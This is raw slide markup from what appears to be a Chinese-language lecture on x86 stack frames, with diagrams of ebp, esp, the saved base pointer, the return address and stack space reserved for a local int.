            <a:off x="831693" y="4422130"/>
            <a:ext cx="21820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j-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>讓</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> 移動到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>讓整個</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>移動到</a:t>
            </a:r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en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Func</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> 的 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>frame</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="正方形/長方形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C010FA-E058-CB49-BAD0-07FBCD4C4076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9807563" y="4199228"/>
            <a:ext cx="2384437" cy="8753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14" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{600F4C94-7AF7-4045-8DC2-AF3E06899A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9359464" y="4588048"/>
            <a:ext cx="638710" cy="12838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テキスト ボックス 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF892013-7C7E-0C43-A0A8-94225EBFB897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9931022" y="4222817"/>
            <a:ext cx="21375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 Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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3" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5B4787-A784-7844-A84E-D03C36D8B95E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236043" y="4637196"/>
            <a:ext cx="3571519" cy="39547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18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{606B6D0F-E1C9-1049-B4D9-AA292C7C2565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643142" y="3673338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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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19" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E15E590-8420-46BA-ADD1-38D9D903BDF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6044390" y="2735465"/>
            <a:ext cx="638710" cy="12838"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FFFF0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20E9CD6-9622-4D4F-9A97-5B4638B7DBDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2881046"/>
            <a:ext cx="680313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3547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FA9C07A6-B4F1-714D-B684-DCF8CA48C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93" b="5274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10583"/>
            <a:ext cx="6803136" cy="4150439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22ADF5F9-2C8A-5E42-A684-05FB13EF3D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569112" y="1661975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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824222BD-FBA4-0B45-B59A-EB421C78A5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780930" y="1600610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1" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C199D0FF-D518-6940-8499-A7C05EBE75F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654461" y="4679213"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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2" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3DEA90-648D-2C42-B38C-CA7C75F433B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654460" y="4191019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Return</a:t>
            </a:r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Address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15" name="直線矢印コネクタ 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E8C6FA-BF2D-D349-B49D-F24359508DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4622889" y="3011424"/>
            <a:ext cx="2904804" cy="931545"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF3399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F69AEB2-2022-BB4C-A34B-411A730B8DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526536" y="4407214"/>
            <a:ext cx="2384437" cy="8925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B8C736B-1F9F-B347-94C6-D3BBBAA8D902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3587123" y="4407214"/>
            <a:ext cx="226326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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" b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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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位子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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EA517597-4BDE-034A-A592-3BDA66B47613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5795617" y="4564575"/>
            <a:ext cx="1816308" cy="1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FC17F0B-F3E9-8B4B-BDFB-49C2CB07EBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718172" y="4407214"/>
            <a:ext cx="20810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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>移動 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>0x10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>給一個</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> 的空間</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW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en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> 空間應該是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>0x4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>至於為什麼給</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>0x10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="正方形/長方形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84C010FA-E058-CB49-BAD0-07FBCD4C4076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9807563" y="3121171"/>
            <a:ext cx="2384437" cy="916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8" name="テキスト ボックス 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF892013-7C7E-0C43-A0A8-94225EBFB897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9931022" y="3144760"/>
            <a:ext cx="21375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 Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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3" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5B4787-A784-7844-A84E-D03C36D8B95E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236043" y="4637196"/>
            <a:ext cx="3571519" cy="39547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436A5F3-3D52-434F-90C0-1A2CA0BEA097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7651152" y="3185392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kumimoji="1" lang="zh-TW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zh-TW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7" name="正方形/長方形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{526657C1-BFFF-BF47-B23F-8CC96C6DEEA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643142" y="3673338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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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14" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{600F4C94-7AF7-4045-8DC2-AF3E06899A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9383455" y="3374427"/>
            <a:ext cx="638710" cy="12838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84D7949C-CF7A-2F41-B297-3C8E779AC0B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718172" y="611509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https://stackoverflow.com/questions/19615639/why-the-compiler-reserves-just-0x10-bits-for-a-int</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22DD7A27-7C5F-4E19-8382-76BC350FAD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6044390" y="2937887"/>
            <a:ext cx="638710" cy="12838"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FFFF0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2A8E60E9-12AC-47B2-8888-39801A607D02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3083468"/>
            <a:ext cx="680313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1435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FA9C07A6-B4F1-714D-B684-DCF8CA48C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93" b="5274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10583"/>
            <a:ext cx="6803136" cy="4150439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22ADF5F9-2C8A-5E42-A684-05FB13EF3D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569112" y="1661975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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824222BD-FBA4-0B45-B59A-EB421C78A5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780930" y="1600610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1" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C199D0FF-D518-6940-8499-A7C05EBE75F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654461" y="4679213"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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2" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3DEA90-648D-2C42-B38C-CA7C75F433B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654460" y="4191019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Return</a:t>
            </a:r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Address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15" name="直線矢印コネクタ 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E8C6FA-BF2D-D349-B49D-F24359508DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5404910" y="3380846"/>
            <a:ext cx="2164202" cy="127890"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF3399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F69AEB2-2022-BB4C-A34B-411A730B8DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526536" y="4407214"/>
            <a:ext cx="2384437" cy="8925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B8C736B-1F9F-B347-94C6-D3BBBAA8D902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3689130" y="4407214"/>
            <a:ext cx="22639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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" b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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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位子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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EA517597-4BDE-034A-A592-3BDA66B47613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5795617" y="4564575"/>
            <a:ext cx="1816308" cy="1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FC17F0B-F3E9-8B4B-BDFB-49C2CB07EBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718172" y="4407214"/>
            <a:ext cx="23551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j-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>把</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>0x1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>數字</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>複製到</a:t>
            </a:r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en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>0x4</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
